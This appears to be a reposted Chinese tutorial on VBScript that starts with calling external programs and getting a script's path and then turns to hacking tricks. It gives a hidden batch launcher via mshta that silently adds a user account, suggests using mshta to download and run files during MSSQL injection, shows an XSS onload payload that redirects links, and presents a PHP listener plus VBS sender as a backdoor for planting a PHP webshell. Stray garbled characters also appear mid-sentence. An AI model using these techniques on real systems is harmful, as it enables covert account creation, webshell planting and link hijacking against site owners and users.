关于VBS调用外部程序和获取自身路径的问题。

关于VBS调用外部程序和获取自身路径的问题。,第1张

A脚本

set ws=CreateObject("WScript.Shell")

msgbox ws.CurrentDirectory '当前工作文件夹

ws.Run """C:\Program Files\Internet Explorer\123.vbs"""

B脚本

WScript.echo Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))

wscript.sleep(5000)

'''''''''''''握桐虚'''''''''''''''''''''''''''''''''轮蚂''''''''''''

WScript.echo WScript.ScriptFullName '返回当前运行脚本的完整路径段燃名。

WScript.echo WScript.ScriptName'返回当前运行脚本的文件名。

WScript.echo WScript.Path '返回主可执行文件路径名称。

WScript.echo WScript.FullName '返回主可执行文件名称

vbs有一个对像是“SAPI.SpVoice”,可以用它来讲英语的,这个组件在 xp、2003上默认都可迹镇以用的,调用后可以听到电脑上一个国外老男人在说话。好比这样一句代码:●CreateObject ("SAPI.SpVoice").Speak "I LOVE YOU"●,保存成vbs后缀后双击就会听到英语的我爱你了。但随之而来我们讲到另一个问题,不保存成vbs或vbe后缀如何运行vbs代码。

一、用mshta来运行vbs

hta这种类型的文件运行后也是系统权限,其调用宿主就是mshta.exe。我们在cmd下运行这样一行代码:●mshta vbscript:createobject("sapi.spvoice").speak("I LOVE YOU.")(window.close)●,也会听到同样的发音。这行代码的意思类似是临时生成一个hta文件,然后运行里边的vbs代码,再调用 window.close将运行窗口关掉。整个运行过程是看不到hta窗口的。这种运行方式你会想到什么?最少我是想到了两个。一个是批处理的隐藏运行,基本代码如下:

@echo off

if "%1" == "h" goto begin

mshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit

:begin

rem 下边开始写批处代码了

net user lcx 12345 /add

这个代码只能双击运行,运行过程中你看不到具体的批处理运行流程的。第二个我想的是注射过程中的用途。网上有篇流传很广的文章《mssql注射中多次调用参数导致多次echo的解决方法》,中心思想是姿灶粗将vbs语句用冒号连接起来然后用echo命令一次写入到被注入的辩塌肉鸡上,然后再调用这个vbs来下载文件。如果调用mshta执行的话,下载、执行一次就ok了。不过在命令行下用mshta后边直接跟vbs代码有个难处理的问题是空格,不过这个好解决用 execute将vbs代码放在括号里就ok了,这个读者可以亲自去试一下了,相信我不难的。

二、用ie地址栏运行vbs

很多人会用ie地址栏运行js,其实vbs一样是可以的,我们随便打开一个网站,在地址栏上输入:vbscript:msgbox (Document.links.length)后回车,就会看到当前页面有多少个连接了。用document.links(i).href这句的话,将 i换成不同的自然数好比0、1、2、3等就会分别显示出不同的链接地址。这部份内容其实是涉及到dhtml的内容了。我们来看一个最简单的示例代码:

<a href=http://www.sohu.com>www.sohu.com</a>

<a href=http://www.baidu.com>www.baidu.com</a>

这是两个链接,保存成网页后点击就会跳转到不同的页面。如果这个页面有跨站,我想搞下破坏,让用户点击www.sohu.com却跑到我指定的页面上能做到吗?其实可以的,只要加一行语句就可以了,代码是:●<body onload=vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com">●。这样的话用户再点击sohu其实会跑到google上去了,原来页面的版式却丝毫没有破坏。同样的dhtml元素还有document.links (i).href、document.images(i).src、document.forms(i).action等等,跨站改变其动态元素是很好玩的。

三、调用外部组件来运行vbs

vbs本身功能毕竟有限,但是却可以很好的与外部交互。要是用vbs来模拟nc发包的话,就要调用vb组件了。关于VBS如何成功调用 MSWinsock.Winsock,zzzevazzz说的很清楚了。就是下载Winsock.ocs注册,和VB6控件的授权密钥的.reg导入注册表。两个文件可以在http://zzzevazzz.bokee.com/inc/vb6controls.rar这里下载。前不久学了一段时间php,网上看到一个php的监听程序,可以用它来做一个后门,s端s.php代码如下:

<?

// 设置一些基本的变量

$host = "192.168.8.100"

$port = 12345

// 设置超时时间

set_time_limit(0)

// 创建一个Socket

$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create

socket ")

//绑定Socket到端口

$result = socket_bind($socket, $host, $port) or die("Could not bind to

socket ")

// 开始监听链接

$result = socket_listen($socket, 3) or die("Could not set up socket

listener ")

// accept incoming connections

// 另一个Socket来处理通信

$spawn = socket_accept($socket) or die("Could not accept incoming

connection ")

// 获得客户端的输入

$input = socket_read($spawn, 1024) or die("Could not read input ")

// 清空输入字符串

$input = trim($input)//将输入结果写入ok.php,这句是我加的

fputs(fopen(ok.php,a+),"$input")

//处理客户端输入并返回结果

$output = strrev($input) . " "

socket_write($spawn, $output, strlen ($output)) or die("Could not write

output ")

// 关闭sockets

socket_close($spawn)

socket_close($socket)

?>

在ie打开这个php,运行它的服务器会监听12345端口。如果我们再用vbs向12345端口发包的话,在同文件的php目录下会生成ok.php。发包的内容就是我们要写入ok.php的代码。该vbs文件c.vbs代码如下:

Set ie=WScript.CreateObject("InternetExplorer.Application")

ie.visible=false

ie.Navigate "http://192.168.8.100/s.php" s.php是服务端

While ie.Busy

WScript.Sleep 100

Wend

Do

Wscript.Sleep 200

Loop Until ie.ReadyState=4

Set socket=WScript.CreateObject("MSWinsock.Winsock")

socket.Protocol=0

socket.RemotePort="12345" 端口

socket.RemoteHost="192.168.8.100" 主机

socket.connect socket.RemoteHost, socket.RemotePort 连接

WScript.sleep 10

ddd="<?phpinfo()>"&Chr(13) 这里你可以改成一句话的php木马

socket.SendData ddd

WScript.sleep 100

wscript.echo "ok"

socket.senddata Chr(13)

socket.close

Set ie=nothing

一个vbs和一个php珠联璧合,打造了一个非常规后门。当然这个后门的价值不大,但重要的是思路


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/yw/12481278.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-25
下一篇 2023-05-25

发表评论

登录后才能评论

评论列表(0条)

保存